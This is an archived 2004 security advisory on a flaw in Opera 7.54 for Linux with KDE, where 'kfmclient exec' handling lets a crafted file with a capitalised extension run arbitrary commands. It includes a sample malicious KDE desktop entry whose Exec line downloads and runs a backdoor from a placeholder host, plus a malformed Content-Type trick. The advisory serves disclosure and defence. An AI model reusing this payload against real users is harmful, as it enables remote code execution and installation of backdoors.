6503.txt

6503.txt: Posted Dec 30, 2004; Authored by Giovanni Delvecchio; Opera for Linux has a flaw that allows remote users to execute arbitrary shell commands via the kfmclient default setting for file viewing.; tags | advisory, remote, arbitrary, shell; systems | linux; SHA-256 | 6e830b38ac586e07e969fb71a81ff3acc17f353b8575b8b7d48c8adc5a1efa90; Download | Favorite | View

6503.txt

Author: Giovanni Delvecchio
e-mail: badpenguin@zone-h.org

Original Advisory: http://www.zone-h.org/advisories/read/id=6503

Tested version:
Opera 7.54 linux version with Kde 3.2.3



Problem:
=======
Opera for linux uses "kfmclient exec" as "Default Application" to handle
saved files.
This could be used by malicious remote users to execute arbitrary shell
commands on a target system.
Indeed, the command "kfmclient exec" could be used to open a "Kde Desktop 
Entry" and therefore execute the command within the "Exec=" entry.

Example of [KDE Desktop Entry]:

________________________________

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec="Any arbitrary command"
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
______________________________


Possible method of Exploitation
=========================

This method of exploitation needs that a particular file name extension
is used.
If page.Htm is used as file name and "kfmclient exec page.Htm" is opened , 
the command in "Exec=" entry will be executed.
Instead, If "page.htm" is used as file name, it will not be opened like a 
"kde desktop entry" but it will be viewed in konqueror.
It works also with Jpg,Gif etc.. , but not with jpg,gif..extension, since
the "system" is case sensitive.

Attack scenario:

1- A user clicks on a link which requires http://malicious_server/image.Jpg

2- malicious_server responds with an unknown Content-Type field , for
example Content-Type: image/Jpeg. (note the dot at the end), so Opera will 
show a dialog window.

3- if a user chooses "Open" to view image.Jpg, it will be opened by
"kfmclient exec" command, since kfmclient is the "Default Application"

4- Image.Jpg is a kde desktop entry :

--------image.Jpg----------

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c 
wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0

---- end of image.Jpg-------

Note: \t is an horizontal tab.
In this case a backdoor will be downloaded on victim's computer and 
executed.



Solution:
========
Disable "kfmclient exec" as default application

_________________________________________________________________
Filtri antispamming e antivirus per la tua casella di posta 
http://www.msn.it/msn/hotmail

Top Authors In Last 30 Days

Red Hat 239 files
indoushka 139 files
Ubuntu 79 files
Gentoo 33 files
Debian 26 files
Sebastian Hamann 8 files
Jann Horn 7 files
Google Security Research 6 files
Moritz Abrell 6 files
Jaggar Henry 6 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,110)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,941)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,657)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,783)
UNIX (9,443)
UnixWare (187)
Windows (6,679)
Other

6503.txt

6503.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

6503.txt

Share This

6503.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems